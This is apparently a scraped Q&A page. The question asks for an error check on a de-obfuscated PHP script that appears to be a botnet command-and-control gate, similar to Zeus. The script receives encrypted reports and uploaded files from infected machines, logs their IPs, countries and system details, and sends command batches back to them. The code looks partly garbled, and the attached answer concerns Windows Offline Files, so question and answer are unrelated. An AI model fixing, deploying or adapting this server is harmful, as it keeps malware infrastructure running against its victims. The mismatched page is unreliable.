Question : Check code for possible errors

I want check php code for possible errors, is there some obvious mistakes or all is correct, the file seems has been unzended. What means encoded stuff in first line?
"J¿\x136¿K¿¿y¿u.#H\x18¿\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

1: 2: 3: 4: 5: 6: 7: 8: 9: 10: 11: 12: 13: 14: 15: 16: 17: 18: 19: 20: 21: 22: 23: 24: 25: 26: 27: 28: 29: 30: 31: 32: 33: 34: 35: 36: 37: 38: 39: 40: 41: 42: 43: 44: 45: 46: 47: 48: 49: 50: 51: 52: 53: 54: 55: 56: 57: 58: 59: 60: 61: 62: 63: 64: 65: 66: 67: 68: 69: 70: 71: 72: 73: 74: 75: 76: 77: 78: 79: 80: 81: 82: 83: 84: 85: 86: 87: 88: 89: 90: 91: 92: 93: 94: 95: 96: 97: 98: 99: 100: 101: 102: 103: 104: 105: 106: 107: 108: 109: 110: 111: 112: 113: 114: 115: 116: 117: 118: 119: 120: 121: 122: 123: 124: 125: 126: 127: 128: 129: 130: 131: 132: 133: 134: 135: 136: 137: 138: 139: 140: 141: 142: 143: 144: 145: 146: 147: 148: 149: 150: 151: 152: 153: 154: 155: 156: 157: 158: 159: 160: 161: 162: 163: 164: 165: 166: 167: 168: 169: 170: 171: 172: 173: 174: 175: 176: 177: 178: 179: 180: 181: 182: 183: 184: 185: 186: 187: 188: 189: 190: 191: 192: 193: 194: 195: 196: 197: 198: 199: 200: 201: 202: 203: 204: 205: 206: 207: 208: 209: 210: 211: 212: 213: 214: 215: 216: 217: 218: 219: 220: 221: 222: 223: 224: 225: 226: 227: 228: 229: 230: 231:

<?php /*********************/ /* */ /* Version : 5.1.0 */ /* Author : RM */ /* Comment : 071223 */ /* */ /*********************/ function sendemptyreply( ) { $reply_data = pack( "LLL", HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1 )."J¿\x136¿K¿¿y¿u.#H\x18¿\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; echo rc4( $reply_data, BIN_CRYPTKEY ); exit( ); } function getcountryipv4( ) { global $real_ipv4; $ip = sprintf( "%u", ip2long( $real_ipv4 ) ); if ( ( $r = @mysql_query( "SELECT c FROM ipv4toc WHERE l<='".$ip."' AND h>='".$ip."' LIMIT 1" ) ) && ( $m = mysql_fetch_row( $r ) ) !== false ) { return $m[0]; } return "--"; } function touint( $str ) { $q = @unpack( "L", $str ); if ( is_array( $q ) && is_numeric( $q[1] ) ) { return $q[1]; } return 0; } function toint( $str ) { $q = @unpack( "l", $str ); if ( is_array( $q ) && is_numeric( $q[1] ) ) { return $q[1]; } return 0; } function toushort( $str ) { $q = @unpack( "S", $str ); if ( is_array( $q ) && is_numeric( $q[1] ) ) { return $q[1]; } return 0; } define( "__REPORT__", "1" ); if ( $_SERVER['REQUEST_METHOD'] !== "POST" ) { exit( ); } require_once( "system/global.php" ); require_once( "system/config.php" ); $data = @file_get_contents( "php://input" ); $data_size = @strlen( $data ); if ( $data_size < HEADER_SIZE + ITEM_HEADER_SIZE ) { exit( ); } $data = rc4( $data, BIN_CRYPTKEY ); if ( strcmp( md5( substr( $data, HEADER_SIZE ), true ), substr( $data, HEADER_MD5, 16 ) ) !== 0 ) { exit( ); } $list = array( ); $i = HEADER_SIZE; while ( $i < $data_size ) { $k = @unpack( "L4", @substr( $data, $i, ITEM_HEADER_SIZE ) ); $list[$k[1]] = @substr( $data, $i + ITEM_HEADER_SIZE, $k[3] ); $i += ITEM_HEADER_SIZE + $k[3]; } unset( $data ); if ( empty( $list[SBCID_BIN_VERSION] ) || empty( $list[SBCID_BIN_ID] ) ) { exit( ); } if ( !connecttodb( ) ) { exit( ); } $bin_id = trim( $list[SBCID_BIN_ID] ); $bin_id_q = addslashes( $bin_id ); $binnet = empty( $list[SBCID_BINNET] ) ? DEFAULT_BINNET : trim( $list[SBCID_BINNET] ); $binnet_q = addslashes( $binnet ); $bin_version = touint( $list[SBCID_BIN_VERSION] ); $real_ipv4 = trim( !empty( $_GET['ip'] ) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR'] ); $country = getcountryipv4( ); $country_q = addslashes( $country ); $curtime = time( ); $rtime_min_online = $curtime - BIN_TIMEOUT * 60; if ( !empty( $list[SBCID_BATCH_STATUS] ) ) { do { mysql_query( "UPDATE bincmdbatches SET complete=complete+1, complete_BINs=CONCAT(complete_BINs, '\\0".$bin_id_q."\\0') WHERE batch_id='".toint( $list[SBCID_BATCH_STATUS] )."' LIMIT 1" ); file_put_contents( "2", mysql_error( ) ); sendemptyreply( ); } else { if ( !empty( $list[SBCID_BINLOG] ) || !empty( $list[SBCID_BINLOG_TYPE] ) ) { $type = touint( $list[SBCID_BINLOG_TYPE] ); if ( $type == BLT_FILE ) { $bad_exts = array( "php", "asp", "exe", "pl", "cgi", "cmd", "bat" ); $fd_hash = md5( $list[SBCID_BINLOG] ); $file_path = str_replace( "\\", "/", "/".$BINnet."/".$BIN_id."/".( empty( $list[SBCID_PATH_DEST] ) ? "unknown" : $list[SBCID_PATH_DEST] ) ); if ( strpos( $file_path, "/.." ) === false ) { $file_path = REPORTS_PATH."/files/".$file_path; $inf = pathinfo( $file_path ); if ( empty( $inf['extension'] ) ) { $inf['extension'] = "dat"; } $file_path = $inf['dirname']."/".basename( $inf['basename'], ".".$inf['extension'] )."*.".$inf['extension']; if ( array_search( strtolower( $inf['extension'] ), $bad_exts ) !== false ) { $file_path .= ".dat"; } $i = 0; for ( ; $i < 9999; ++$i ) { $f = str_replace( "*", $i == 0 ? "" : "[".$i."]", $file_path ); if ( file_exists( $f ) ) { if ( ( $fd_size = filesize( $f ) ) && strcmp( md5_file( $f ), $fd_hash ) === 0 ) { break; if ( md5_file( $f ) ) { break; } } else { if ( createdir( $inf['dirname'] ) ) { } if ( !( $h = fopen( $f, "wb" ) ) ) { exit( ); } flock( $h, LOCK_EX ); fwrite( $h, $list[SBCID_BINLOG] ); flock( $h, LOCK_UN ); fclose( $h ); } break; } } } else if ( REPORTS_TO_DB == 1 ) { $table = "reports_".gmdate( "ymd", $curtime ); $query = "INSERT DELAYED INTO ".$table." SET BIN_id='".$bin_id_q."',BINnet='".$BINnet_q."',BIN_version='".$BIN_version."',path_source='".( empty( $list[SBCID_PATH_SOURCE] ) ? "" : addslashes( $list[SBCID_PATH_SOURCE] ) )."',path_dest='".( empty( $list[SBCID_PATH_DEST] ) ? "" : addslashes( $list[SBCID_PATH_DEST] ) )."',time_system='".( empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : toint( $list[SBCID_TIME_SYSTEM] ) )."',time_tick='".( empty( $list[SBCID_TIME_TICK] ) ? 0 : toint( $list[SBCID_TIME_TICK] ) )."',time_localbias='".( empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toint( $list[SBCID_TIME_LOCALBIAS] ) )."',os_version='".( empty( $list[SBCID_OS_INFO] ) ? "" : addslashes( $list[SBCID_OS_INFO] ) )."',language_id='".( empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toushort( $list[SBCID_LANGUAGE_ID] ) )."',process_name='".( empty( $list[SBCID_PROCESS_NAME] ) ? "" : addslashes( $list[SBCID_PROCESS_NAME] ) )."',type='".$type."',ipv4='".addslashes( $real_ipv4 )."',country='".$country_q."',rtime='".$curtime."',context='".addslashes( $list[SBCID_BINLOG] )."'"; if ( @!mysql_query( $query ) || @( !mysql_query( "CREATE TABLE IF NOT EXISTS ".$table." LIKE reports" ) && !@mysql_query( $query ) ) ) { exit( ); } } else if ( REPORTS_TO_FS == 1 ) { $file_path = str_replace( "\\", "/", "/".$BINnet."/".$real_ipv4 ); if ( !( strpos( $file_path, "/.." ) === false ) ) { break; } $file_path = REPORTS_PATH."/logs/".$file_path; if ( createdir( $file_path ) ) { } if ( !( $h = fopen( $file_path."/".$BIN_id, "wb" ) ) ) { exit( ); } flock( $h, LOCK_EX ); fwrite( $h, "bin_id=".$bin_id."\r\nbinnet=".$binnet."\r\ntime_system=".( empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : ftime( "H:i:s d.m.Y", toint( $list[SBCID_TIME_SYSTEM] ) ) )."\r\ntime_tick=".( empty( $list[SBCID_TIME_TICK] ) ? 0 : toint( $list[SBCID_TIME_TICK] ) )."\r\ntime_localbias=".( empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toint( $list[SBCID_TIME_LOCALBIAS] ) )."\r\nlanguage_id=".( empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toushort( $list[SBCID_LANGUAGE_ID] ) )."\r\nprocess_name=".( empty( $list[SBCID_PROCESS_NAME] ) ? "" : $list[SBCID_PROCESS_NAME] )."\r\ntype=".$type."\r\nipv4=".$real_ipv4."\r\ncountry=".$country."\r\nrtime=".ftime( "H:i:s d.m.Y", $curtime )."\r\ncontext=".$list[SBCID_BINLOG]."\r\n\r\n\r\n" ); flock( $h, LOCK_UN ); fclose( $h ); } } else if ( !empty( $list[SBCID_BIN_STATUS] ) ) { $query = "BIN_id='".$bin_id_q."',BINnet='".$BINnet_q."',BIN_version='".$BIN_version."',net_latency='".( empty( $list[SBCID_NET_LATENCY] ) ? 0 : touint( $list[SBCID_NET_LATENCY] ) )."',port_s1='".( empty( $list[SBCID_PORT_S1] ) ? 0 : toushort( $list[SBCID_PORT_S1] ) )."',time_localbias='".( empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toint( $list[SBCID_TIME_LOCALBIAS] ) )."',os_version='".( empty( $list[SBCID_OS_INFO] ) ? "" : addslashes( $list[SBCID_OS_INFO] ) )."',language_id='".( empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toushort( $list[SBCID_LANGUAGE_ID] ) )."',ipv4='".addslashes( $real_ipv4 )."',country='".$country_q."',rtime_last='".$curtime."'"; if ( mysql_query( "INSERT INTO BINlist SET rtime_first='".$curtime."', rtime_online='{$curtime}', flag_install='".( touint( $list[SBCID_BIN_STATUS] ) == BS_INSTALLED ? 1 : 0 )."', ".$query.( "ON DUPLICATE KEY UPDATE rtime_online=IF(rtime_last <= '".$rtime_min_online."', '{$curtime}', rtime_online), {$query}" ) ) ) { break; } exit( ); } else { exit( ); } } while ( 0 ); } $reply_data = ""; $reply_count = 0; $BIN_id_q = tosqlsafemask( $BIN_id_q ); $BINnet_q = tosqlsafemask( $BINnet_q ); $country_q = tosqlsafemask( $country_q ); $r = @mysql_query( "SELECT id, batch_id, batch_text FROM BINcmdbatches WHERE flag_disabled=0 AND (send_limit=0 OR sended < send_limit) AND ".( "(complete_BINs NOT LIKE '%\\0".$BIN_id_q."\\0%') AND " ).( "(countries_wl='' OR countries_wl LIKE BINARY '%\\0".$country_q."\\0%') AND " ).( "(countries_bl NOT LIKE BINARY '%\\0".$country_q."\\0%') AND " ).( "(binnets_wl='' OR binnets_wl LIKE BINARY '%\\0".$BINnet_q."\\0%') AND " ).( "(binnets_bl NOT LIKE BINARY '%\\0".$BINnet_q."\\0%') AND " ).( "(BINs_wl='' OR BINs_wl LIKE BINARY '%\\0".$BIN_id_q."\\0%') " )."LIMIT 10" ); while ( $r && ( $m = mysql_fetch_row( $r ) ) ) { $size = strlen( $m[2] ); $reply_data .= pack( "LLLL", $m[1], 0, $size, $size ).$m[2]; ++$reply_count; @mysql_query( "UPDATE bincmdbatches SET sended=sended+1 WHERE id='".$m[0]."' LIMIT 1" ); } if ( 0 < $reply_count ) { $reply_data = pack( "LLL", HEADER_SIZE + strlen( $reply_data ), 0, $reply_count ).md5( $reply_data, true ).$reply_data; echo rc4( $reply_data, BIN_CRYPTKEY ); exit( ); } sendemptyreply( ); ?>

Answer : Check code for possible errors

You said you turned offline files off first and then added the reg key. It could well be that it's the offline file service that reads the key and acts upon it and that because you've turned offline files off it's not performing this action. Try turning it back on, re-apply the regkey then turn it back off.

Having said that I've just re-read your post and you mentioned that the key is being deleted which would suggest it's being read. Worth a try though.

With regards to manually clearing the CSC folder this shouldn't cause any issues i've done this before with no adverse effects.